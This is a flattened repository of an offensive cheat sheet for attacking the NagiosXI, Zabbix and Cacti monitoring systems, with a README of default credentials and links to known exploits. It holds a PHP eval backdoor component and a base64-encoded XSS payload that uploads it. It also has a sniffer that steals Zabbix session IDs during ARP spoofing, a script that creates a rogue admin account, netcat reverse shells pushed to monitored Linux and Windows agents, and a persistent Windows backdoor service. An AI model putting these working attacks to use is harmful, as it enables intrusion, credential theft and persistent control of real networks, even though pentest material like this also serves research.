├── php_shell_via_component_upload_NagiosXI.md ├── README.md ├── Zabbix_session_hijacking.md ├── xss_or_js_shell_uploading_NagiosXI.md └── Zabbix_spawn_shell_on_agents.md /php_shell_via_component_upload_NagiosXI.md: -------------------------------------------------------------------------------- 1 | ## After the NagiosXI administration panel has been accessed, we can upload our malicious component that will give us the web shell on the server, even if we are not authorized on it. ## 2 | # Component code example # 3 | ```php 4 | $shellaction_component_name, 25 | COMPONENT_AUTHOR => "test", 26 | COMPONENT_DESCRIPTION => _("test. ") . $desc, 27 | COMPONENT_TITLE => "shell", 28 | COMPONENT_DATE => '08/08/2017', 29 | COMPONENT_VERSION => '1.3.3.7' 30 | ); 31 | 32 | register_component($shellaction_component_name, $args); 33 | 34 | if (isset($_GET['_cmd'])) 35 | eval($_GET['_cmd']); 36 | } 37 | 38 | ``` 39 | ## Component creation and uploading ## 40 | 1) First, the component must be saved with a name similar to the variable *$shellaction_component_name*.inc.php (example: shellaction.inc.php). 41 | 42 | 2) Put the file in a folder with the same name of the variable (example: shellaction). 43 | 44 | ![file into folder](https://image.prntscr.com/image/wxoJEU6gSgmmRG3wHDovuA.png) 45 | 46 | 3) After all the folder should be zip archived (example for *nix: zip -r shell.zip shellaction). 47 | 48 | 4) Go to the section manage components and upload our component (shell.zip). 49 | 50 | ![manage components](https://image.prntscr.com/image/l7K9XR4hS0WWQMQnApg6Bw.png) 51 | 52 | ![check if it's added](https://image.prntscr.com/image/luboWJCYQiCKzQ1FzkMKew.png) 53 | 54 | ## Command execution ## 55 | 56 | After that we can execute system commands directly through the address bar of the browser (example: host/nagiosxi/admin?xiwindow=dashlets.php&_cmd=system('cat etc/passwd');) 57 | 58 | ![it works!](https://image.prntscr.com/image/ouIOS_EpTxWQkk4lOnDofw.png) 59 | ## We are done here! ## 60 | 61 | Tested on NagiosXI 5.4.8 62 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Monitoring-Systems-Cheat-Sheet # 2 | Cheat sheet for pentesters and researchers about monitoring systems exploitation. 3 | 4 | ## Exploring ## 5 | Check the version of the system. Try to log in with default credentials. 6 | 7 | ### Version Check ### 8 | 9 | [Zabbix/Nagios version checker](https://github.com/HD421/Monitoring-Systems-Version-Check) 10 | 11 | [Cacti version checker](https://github.com/worlak2/cactiVersionCheck) 12 | 13 | ### Default Credentials ### 14 | 15 | | | SSH Credentials | Database Credentials |Web Credentials |Port| 16 | |------- |:-------------------:| -------------------------------------|-----------------------|-----| 17 | | Zabbix <= 2.4 | root/zabbix zabbix/zabbix| root/zabbix zabbix/zabbix|Admin/zabbix admin/admin |10050 10051| 18 | | Zabbix >= 3.0 | appliance/zabbix | zabbix/zabbix |Admin/zabbix Admin/Admin |10050 10051| 19 | | Nagios | root/nagiosxi | -- |nagiosadmin/nagios nagiosadmin/nagiosadmin|5666| 20 | | Cacti | -- | cactiuser/cactiuser |admin/admin| 80 443 8080 | 21 | 22 | ## Exploits ## 23 | Known vulnerabilities. 24 | 25 | | NagiosXI | Version | 26 | |-------|---------| 27 | |[NRPE RCE](https://www.exploit-db.com/exploits/24955/)| 5.2.8<= | 28 | |[Chained RCE](https://www.exploit-db.com/exploits/40067/)| 5.2.7<= | 29 | |[Chained Remote Root](https://www.exploit-db.com/exploits/44560/)| 5.4.12<= | 30 | 31 | | Zabbix | Version | 32 | |-------|---------| 33 | |[Command Execution](http://www.cvedetails.com/cve/cve-2009-4498)| 1.7.4<= | 34 | 35 | | Cacti | Version | 36 | |-------|---------| 37 | |[SQL Injection](https://vulners.com/cve/CVE-2016-3172)| 0.8.8g<= | 38 | |[SQL Injection](https://vulners.com/cve/CVE-2015-8604)| 0.8.8f | 39 | |[SQL Injection](https://vulners.com/zdt/1337DAY-ID-24696)| 0.8.8f | 40 | |[SQL Injection](https://vulners.com/cve/CVE-2015-4634)| 0.8.8d | 41 | |[SQL Injection](https://vulners.com/cve/CVE-2015-4454)| 0.8.8c | 42 | |[Reflected XSS](https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-007/?fid=7789)| 0.8.8b | 43 | |[SQL Injection](https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-007/?fid=7789)| 0.8.8b | 44 | |[Reflected XSS](https://github.com/Cacti/cacti/issues/838)| 1.1.12 | 45 | |[Reflected XSS](https://github.com/Cacti/cacti/issues/867)| 1.1.13 | 46 | |[Path Traversal](https://github.com/Cacti/cacti/issues/877)| 1.1.15 | 47 | |[RCE](https://github.com/Cacti/cacti/issues/877)| 1.1.15 | 48 | |[Reflected XSS](https://github.com/Cacti/cacti/issues/877)| 1.1.15 | 49 | |[Reflected XSS](https://github.com/Cacti/cacti/issues/907)| 1.1.17 | 50 | |[Stored XSS](https://github.com/Cacti/cacti/issues/918)| 1.1.17 | 51 | |[Reflected XSS](https://github.com/Cacti/cacti/issues/1010)| 1.1.23 | 52 | |[RCE](https://github.com/Cacti/cacti/issues/1057)| 1.1.27 | 53 | |[AFR+RCE](https://github.com/Cacti/cacti/issues/1066)| 1.1.27 | 54 | 55 | 56 | 57 | ## Postexploitation ## 58 | You are successfully logged in, what's next? 59 | 60 | ### NagiosXI ### 61 | [Spawning PHP Shell via component uploading](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/php_shell_via_component_upload_NagiosXI.md) 62 | 63 | [XSS -> RCE vector. Spawning shell via JS execution (worked on NagiosXI <= 5.4.12)](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/xss_or_js_shell_uploading_NagiosXI.md) 64 | 65 | [XSS -> RCE by polict (NagiosXI 5.5.10)](https://www.shielder.it/blog/nagios-xi-5-5-10-xss-to-root-rce/) 66 | 67 | [RCE on Monitored Hosts through the NRPE(<= 2.14) plugin](https://vulners.com/metasploit/MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS) 68 | 69 | [NagiosXI Vulnerability Chaining. Death By a Thousand Cuts (<= 5.4.12)](https://blog.redactedsec.net/exploits/2018/04/26/nagios.html) 70 | 71 | ### Zabbix ### 72 | [Stealing administrator's session and creating our own privileged account (ARP-spoofing)](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/Zabbix_session_hijacking.md) 73 | 74 | [Spawn shell on monitored agents (Unix/Windows)](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/Zabbix_spawn_shell_on_agents.md) 75 | 76 | ### PRTG ### 77 | 78 | [PRTG NETWORK MONITOR PRIVILEGE ESCALATION (version 18.2.41.1652)](https://www.criticalstart.com/2018/10/prtg-network-monitor-privilege-escalation/) || [Exploit](https://github.com/Critical-Start/Section-8/blob/master/Paessler%20-%20PRTG/prtg_privesc.ps1) 79 | -------------------------------------------------------------------------------- /Zabbix_session_hijacking.md: -------------------------------------------------------------------------------- 1 | ## A bit of theory 2 | The Zabbix server port is 10051 by default and the agent's is 10050. 3 | 4 | Traffic between the agent and the server (if you don't configure the encryption of the transmitted data in the agent configuration) 5 | is transmitted in plaintext, in TCP packets with the PSH flag. 6 | 7 | Zabbix APIs are web-based and delivered as part of the Web interface and use the JSON-RPC 2.0 protocol. 8 | To use most of Zabbix's features it's enough to send HTTP POST requests to the api_jsonrpc.php file, which is located in a folder with a web interface. 9 | 10 | This means that when authorizing a user on the system (for example, when the administrator logs into the Zabbix web interface), a request / response is made in the JSON format. 11 | For each user, zbx_sessionid is generated, and used in queries to the Zabbix server. 12 | 13 | The zbx_sessionid transfer process occurs when the user is authorized through the web interface, entering their login and password. 14 | Value of zbx_sessionid «salted» with timestamp which almost excludes its forgery. 15 | However, it is passed to the zbx_sessionid field in the POST request in plain text. 16 | 17 | Is it possible to reuse the intercepted zbx_sessionid? Yes, it is, while the user is logged in the system. 18 | 19 | ## Hijacking 20 | We will use the simplest method - arp spoofing and a custom script to look for the session id. 21 | 22 | Let's enable package forwarding: 23 | ```bash 24 | sysctl –w net.ipv4.ip_forward=1 25 | ``` 26 | Begin arp spoofing (use for this whateva you want): 27 | 28 | 29 | 30 | Start zbx_sessionid catching script: 31 | 32 | ```python 33 | import socket 34 | import re 35 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800)) 36 | print ("trying to catch zbx_sessionid") 37 | k = '' 38 | while True: 39 | data = s.recvfrom(65565) 40 | try: 41 | if "HTTP" in data[0][54:]: 42 | raw = data[0][54:] 43 | if "\r\n\r\n" in raw: 44 | line = raw.split('\r\n\r\n')[0] 45 | print "[*] Header Captured " 46 | value = line 47 | m = re.search("(zbx_sessionid.*)", value) 48 | if m: 49 | str = m.group(0) 50 | k = re.split(r'\W+', str) 51 | print ("session_id is :") 52 | print (k[1]) 53 | ####Saving zbx_sessionid in file 54 | saved_zbxssids = open('zbx_sessionids.txt','a') 55 | saved_zbxssids.write('\n') 56 | saved_zbxssids.write(k[1]) 57 | saved_zbxssids.write('\n') 58 | saved_zbxssids.close() 59 | print ("zabbix session id saved in file zbx_sessionids.txt") 60 | else: 61 | pass 62 | else: 63 | pass 64 | except KeyboardInterrupt: 65 | s.close() 66 | ``` 67 | 68 | 69 | ## Postexploitation time 70 | 71 | It's time to create account with administrator privileges. 72 | The following script will help us: 73 | 74 | ```python 75 | import json 76 | import requests 77 | from pyzabbix import ZabbixAPI 78 | #api_address="http://192.168.56.102/zabbix/api_jsonrpc.php" 79 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n") 80 | zbx_sessionid= raw_input("enter zbx_sessionid: \n") 81 | user= raw_input("enter username: \n") 82 | password= raw_input("enter password: \n") 83 | url = api_address 84 | headers = {'Content-type': 'application/json'} 85 | data = {"jsonrpc": "2.0", "method": "user.create", "params": { 86 | "alias": user, "passwd": password, "type": "3", "usrgrps": [ 87 | {"usrgrpid": "7"}], }, 88 | "auth": zbx_sessionid, 89 | "id": 1 90 | } 91 | answer = requests.post(url, data=json.dumps(data), headers=headers) 92 | print(answer) 93 | response = answer.json() 94 | print(response) 95 | ###Using pyzabbix to connect whith created user creds 96 | print ("testing user parameters:") 97 | zapi = ZabbixAPI(api_address) 98 | zapi.login(user, password) 99 | print("Connected to Zabbix API Version %s" % zapi.api_version()) 100 | ``` 101 | 102 | 103 | 104 | Check web interface: 105 | 106 | 107 | -------------------------------------------------------------------------------- /xss_or_js_shell_uploading_NagiosXI.md: -------------------------------------------------------------------------------- 1 | # PHP shell spawn in a single request # 2 | ## This is working on NagiosXI 5.4.12 and may be on previous versions ## 3 | 4 | You can skip [building evil component](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/php_shell_via_component_upload_NagiosXI.md) step and execute command below in order to upload PHP shell. 5 | 6 | ## Creating javascript function for component uploading ## 7 | ```javascript 8 | (function() { var raw = window.atob('UEsDBAoAAAAAACF2CksAAAAAAAAAAAAAAAAMABwAc2hlbGxhY3Rpb24vVVQJAANdcoxZcXKMWXV4CwABBOgDAAAEZAAAAFBLAw QUAAAACADpdQpLAQDoCrkBAAASBAAAHwAcAHNoZWxsYWN0aW9uL3NoZWxsYWN0aW9uLmluYy5waHBVVAkAA/VxjFkfcoxZdXgLAAEE6AMAAAR kAAAArVNda9swFH2efsXFBGxD64/0g5CsG8ZzW0PqhMTdQ8sQmq06Akf2JLdQxv57JSVpsmLy1IsR+N57zrn3WP76vV21yPfVA3PGK4iKjjUc4mbdNpzyT hfipn0VrFp14BQuDIMwOFXHBWSkYo2EhHdUtIJJKk9gOo09iOoaDECCoJKKF1p6mgj0MUjLMcgVrWtitDzGC09NAeFouCEPw9NwpF7HZ8H4/PIBaEVq2Z ESBggJ+ueZCYobXlCnZIKTNXUwvk6nCcYueGD7nucXu/GVTEvFTsJ2JwgNDrTxeyPWRHAF1kHVmqD+XsZZ52gu/5PCuDy7m8+yJMshzdIcru+zOE9n2fLzR NDTM9983mNrob8IVFR185vUcMQttb9uHJRUFto5Zdc2Q0QlVYYIQV4dk9LxviDOorsErr7BPo7InPQQRPf57WxxSGF1VHZWX++PZBkv0rn2cgvAjun2wNI XxszfB8zTfPr/mJvL0a8S5R9WsoNzfzjy1Y2+tPsQP5PFcj+TQYReYJtOd+utoBWT6u/aW+Icc2rj/A7MnsBhUlKFwTdJ/mjjYl3av1zXVL/QF1J/qEzQP/QGUEsB Ah4DCgAAAAAAIXYKSwAAAAAAAAAAAAAAAAwAGAAAAAAAAAAQAO1BAAAAAHNoZWxsYWN0aW9uL1VUBQADXXKMWXV4CwABBOgDAAAEZAAA AFBLAQIeAxQAAAAIAOl1CksBAOgKuQEAABIEAAAfABgAAAAAAAEAAADtgUYAAABzaGVsbGFjdGlvbi9zaGVsbGFjdGlvbi5pbmMucGhwVVQFAAP1cYxZ dXgLAAEE6AMAAARkAAAAUEsFBgAAAAACAAIAtwAAAFgCAAAAAA=='); //our evil component shell.zip encrypted as base64 9 | var rl = raw.length; 10 | var u8a = new Uint8Array(rl); 11 | for (var i = 0; i < rl; ++i) 12 | u8a[i] = raw.charCodeAt(i); 13 | var fd = new FormData(); 14 | fd.append('uploadedfile', new Blob([u8a], {type: 'application/zip'})); 15 | fd.append('upload', 1); 16 | fd.append('nsp', parent.window.nsp_str); 17 | var request = new XMLHttpRequest(); request.open("POST", "/nagiosxi/admin/components.php"); 18 | request.send(fd);) })(); 19 | ``` 20 | 21 | ## Optimizing payload ## 22 | Now we base64-encoding our JS function one more time in order to execute the shell uploading in one request. (We are exploiting Reflected XSS vulnerability in xiwindow parameter). 23 | Also if you have access to administrative panel you can execute js function from previous step directly from your browser console. 24 | 25 | ``` 26 | *Your_HOST*/nagiosxi/config/?xiwindow=%20javascript:eval(atob(%27KGZ1bmN0aW9uKCkge3ZhciByYXc9d2luZG93LmF0b2IoJ1VFc0RCQW9BQUFBQUFDRjJDa3NBQUFBQUFBQUFBQUFBQUFBTUFCd0FjMmhsYkd4aFkzUnBiMjR2VlZRSkFBTmRjb3haY1hLTVdYVjRDd0FCQk9nREFBQUVaQUFBQUZCTEF3UVVBQUFBQ0FEcGRRcExBUURvQ3JrQkFBQVNCQUFBSHdBY0FITm9aV3hzWVdOMGFXOXVMM05vWld4c1lXTjBhVzl1TG1sdVl5NXdhSEJWVkFrQUEvVnhqRmtmY294WmRYZ0xBQUVFNkFNQUFBUmtBQUFBclZOZGE5c3dGSDJlZnNYRkJHeEQ2NC8wZzVDc0c4WnpXMFBxaE1UZFE4c1FtcTA2QWtmMkpMZFF4djU3SlNWcHNtTHkxSXNSK041N3pybjNXUDc2dlYyMXlQZlZBM1BHSzRpS2pqVWM0bWJkTnB6eVRoZmlwbjBWckZwMTRCUXVESU13T0ZYSEJXU2tZbzJFaEhkVXRJSkpLazlnT28wOWlPb2FERUNDb0pLS0YxcDZtZ2owTVVqTE1jZ1ZyV3RpdER6R0MwOU5BZUZvdUNFUHc5TndwRjdIWjhINC9QSUJhRVZxMlpFU0JnZ0ordWVaQ1lvYlhsQ25aSUtUTlhVd3ZrNm5DY1l1ZUdEN251Y1h1L0dWVEV2RlRzSjJKd2dORHJUeGV5UFdSSEFGMWtIVm1xRCtYc1paNTJndS81UEN1RHk3bTgreUpNc2h6ZEljcnUrek9FOW4yZkx6Uk5EVE05OTgzbU5yb2I4SVZGUjE4NXZVY01RdHRiOXVISlJVRnRvNVpkYzJRMFFsVllZSVFWNGRrOUx4dmlET29yc0VycjdCUG83SW5QUVFSUGY1N1d4eFNHRjFWSFpXWCsrUFpCa3Ywcm4yY2d2QWp1bjJ3TklYeHN6ZkI4elRmUHIvbUp2TDBhOFM1UjlXc29OemZ6ankxWTIrdFBzUVA1UEZjaitUUVlSZVlKdE9kK3V0b0JXVDZ1L2FXK0ljYzJyai9BN01uc0JoVWxLRndUZEovbWpqWWwzYXYxelhWTC9RRjFKL3FFelFQL1FHVUVzQkFoNERDZ0FBQUFBQUlYWUtTd0FBQUFBQUFBQUFBQUFBQUF3QUdBQUFBQUFBQUFBUUFPMUJBQUFBQUhOb1pXeHNZV04wYVc5dUwxVlVCUUFEWFhLTVdYVjRDd0FCQk9nREFBQUVaQUFBQUZCTEFRSWVBeFFBQUFBSUFPbDFDa3NCQU9nS3VRRUFBQklFQUFBZkFCZ0FBQUFBQUFFQUFBRHRnVVlBQUFCemFHVnNiR0ZqZEdsdmJpOXphR1ZzYkdGamRHbHZiaTVwYm1NdWNHaHdWVlFGQUFQMWNZeFpkWGdMQUFFRTZBTUFBQVJrQUFBQVVFc0ZCZ0FBQUFBQ0FBSUF0d0FBQUZnQ0FBQUFBQT09Jyk7dmFyIHJsPXJhdy5sZW5ndGg7dmFyIHU4YT1uZXcgVWludDhBcnJheShybCk7Zm9yKHZhciBpPTA7aTxybDsrK2kpdThhW2ldPXJhdy5jaGFyQ29kZUF0KGkpO3ZhciBmZD1uZXcgRm9ybURhdGEoKTtmZC5hcHBlbmQoJ3VwbG9hZGVkZmlsZScsbmV3IEJsb2IoW3U4YV0se3R5cGU6J2FwcGxpY2F0aW9uL3ppcCd9KSk7ZmQuYXBwZW5kKCd1cGxvYWQnLDEpO2ZkLmFwcGVuZCgnbnNwJyxwYXJlbnQud2luZG93Lm5zcF9zdHIpO3ZhciBycT1uZXcgWE1MSHR0cFJlcXVlc3QoKTtycS5vcGVuKCJQT1NUIiwiL25hZ2lvc3hpL2FkbWluL2NvbXBvbmVudHMucGhwIik7cnEuc2VuZChmZCk7fSkoKTsK%27))// 27 | ``` 28 | 29 | After execution you can access your shell like this (example: *your_host*/nagiosxi/admin?xiwindow=dashlets.php&_cmd=system('cat etc/passwd');) 30 | 31 | ![de way](https://camo.githubusercontent.com/8fe9aa429048d68def13737b28630f7a2adb3657/68747470733a2f2f696d6167652e70726e747363722e636f6d2f696d6167652f6f75494f535f4570547857516b6b346c4f6e446f66772e706e67) 32 | 33 |
34 | Hint: How to change admin password 35 | _cmd=system(/usr/local/nagiosxi/scripts/reset_nagiosadmin_password.php --password=qwerty 36 |
37 | 38 | Tested on NagiosXI 5.4.12 39 | -------------------------------------------------------------------------------- /Zabbix_spawn_shell_on_agents.md: -------------------------------------------------------------------------------- 1 | # Somehow you've got access to the zabbix admin account or created your own (taking advantage of this [guide](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/Zabbix_session_hijacking.md)). Time for some RCE on the monitored hosts! 2 | 3 | In Zabbix we got ability to run remote commands. This will work in the next state of the agent configuration file: 4 | 1. The value of the ServerActive parameter is the same as the value of the Server parameter. 5 | 2. The Hostname parameter matches the name specified for the host in the Zabbix server's web interface. 6 | 3. EnableRemoteCommands = 1 - Enables the launch of commands that the server sends to the agent. 7 | 4. Timeout = 30 – Specifies how long we wait for agent. Must be between 1 and 30. (Because of this option we can't get persistent shell) 8 | 9 | It is also important to remember that the command length is limited to 255 characters. 10 | As a result, a successful scenario is the addition of a task to create a shell in Zabbix which will be accessible for 30 seconds(in the best scenario) and during his lifetime add an independent persistent shell. 11 | 12 | You can use this script and get information about the monitored agents. 13 | ```python 14 | from pyzabbix import ZabbixAPI 15 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n") 16 | zbx_sessionid= raw_input("enter zbx_sessionid: \n") 17 | user= raw_input("enter username: \n") 18 | password= raw_input("enter password: \n") 19 | zapi = ZabbixAPI(api_address) 20 | zapi.login(user, password) 21 | print("Connected to Zabbix API Version %s" % zapi.api_version()) 22 | for h in zapi.host.get(output="extend"): 23 | hostid=h['hostid'] 24 | host=h['host'] 25 | print ("found host: ",host,"hostid: ",hostid) 26 | ``` 27 | Result: 28 | 29 | 30 | ## Shell on Linux agent 31 | 32 | Script to spawn the netcat shell: 33 | 34 | ```python 35 | from pyzabbix import ZabbixAPI, ZabbixAPIException 36 | import sys 37 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n") 38 | user= raw_input("enter username: \n") 39 | password= raw_input("enter password: \n") 40 | hostname=raw_input("enter hostname: \n") 41 | # hostid=raw_input("enter hostid: \n") 42 | zapi = ZabbixAPI(api_address) 43 | # Login to the Zabbix API 44 | zapi.login(user, password) 45 | host_name = hostname 46 | hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"]) 47 | if hosts: 48 | host_id = hosts[0]["hostid"] 49 | print("Found host id {0}".format(host_id)) 50 | try: 51 | item = zapi.item.create( 52 | hostid=host_id, 53 | name='netcat_create_reverse_shell', 54 | key_='system.run["nc 192.168.56.100 4444 -e /bin/bash"]', 55 | type=0, 56 | value_type=4, 57 | interfaceid=hosts[0]["interfaces"][0]["interfaceid"], 58 | delay=5 59 | ) 60 | except ZabbixAPIException as e: 61 | print(e) 62 | sys.exit() 63 | print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name)) 64 | else: 65 | print("No hosts found") 66 | ``` 67 | 68 | How it's look: 69 | 70 | 71 | Connect to our shell: 72 | 73 | 74 | Now you have to gain a foothold in the system and leave the persistent shell. 75 | 76 | ## Shell on Windows agent 77 | 78 | By default, in Windows the agent is installed and started as a service with System privileges. 79 | ```python 80 | from pyzabbix import ZabbixAPI, ZabbixAPIException 81 | import sys 82 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n") 83 | user= raw_input("enter username: \n") 84 | password= raw_input("enter password: \n") 85 | host_name=raw_input("enter hostname: \n") 86 | # hostid=raw_input("enter hostid: \n") 87 | zapi = ZabbixAPI(api_address) # user='Admin', password='zabbix') 88 | # Login to the Zabbix API 89 | zapi.login(user, password) 90 | # host_name = 'Zabbix_server' 91 | # host_name = "windows host" 92 | hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"]) 93 | if hosts: 94 | host_id = hosts[0]["hostid"] 95 | print("Found host id {0}".format(host_id)) 96 | try: 97 | item = zapi.item.create( 98 | hostid=host_id, 99 | name='netcat_create_reverse_shell', 100 | key_='system.run["bitsadmin.exe /transfer /download http://192.168.56.100/nc.exe C:\\Temp\\nc.exe && C:\Temp\\nc.exe 192.168.56.100 5555 -e cmd.exe"]', 101 | type=0, 102 | value_type=4, 103 | interfaceid=hosts[0]["interfaces"][0]["interfaceid"], 104 | delay=30 105 | ) 106 | except ZabbixAPIException as e: 107 | print(e) 108 | sys.exit() 109 | print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name)) 110 | else: 111 | print("No hosts found") 112 | ``` 113 | 114 | And then... 115 | 116 | 117 | Here we also will interfere with 30 sec timeout, so we'll make a permanent shell. 118 | 119 | The agent is started as a service - so the file can be changed, it is enough for it to register a task on the server. For example we can create item which will use remote commands to append the necessary lines to the end of the configuration file. 120 | What's about our shell? To do this, try to create a service (rights allow us), which will also raise the tunnel with nc. We will create a command to create the service, save it to a file, and then redirect it to the input nc (file service.txt): 121 | 122 | sc create reversencbackdoor binpath= "cmd /C C:\Users\Public\nc.exe 192.168.56.100 6666 -e cmd.exe" type= own start= auto DisplayName= "NC service backdoor" 123 | 124 | To manage the service we use the same approach, only the commands will be changed (file service_run.txt): 125 | ```bash 126 | sc query reversencbackdoor 127 | sc stop reversencbackdoor 128 | sc start reversencbackdoor 129 | ``` 130 | As a result: 131 | 132 | 133 | To connect, we start listening on port 6666 and start the service, without this the service starts and immediately ends its work. 134 | 135 | 136 | 137 | At this moment in separate window: 138 | 139 | 140 | 141 | After Zabbix service will cease to exist, we will have a permanent shell from the service, which will connect to 6666 port: 142 | 143 | 144 | 145 | P.S. 146 | Thanks to [Shodin](https://github.com/freeworkaz) for his contribution to this cheatsheet. The latest versions of these scripts can be found [here](https://github.com/freeworkaz/zabbix_test). Also you can watch the explanation [videos](https://www.youtube.com/channel/UC4wr-m-_6kRz2cHkdtRbW2g/videos) for a deeper understanding. 147 | --------------------------------------------------------------------------------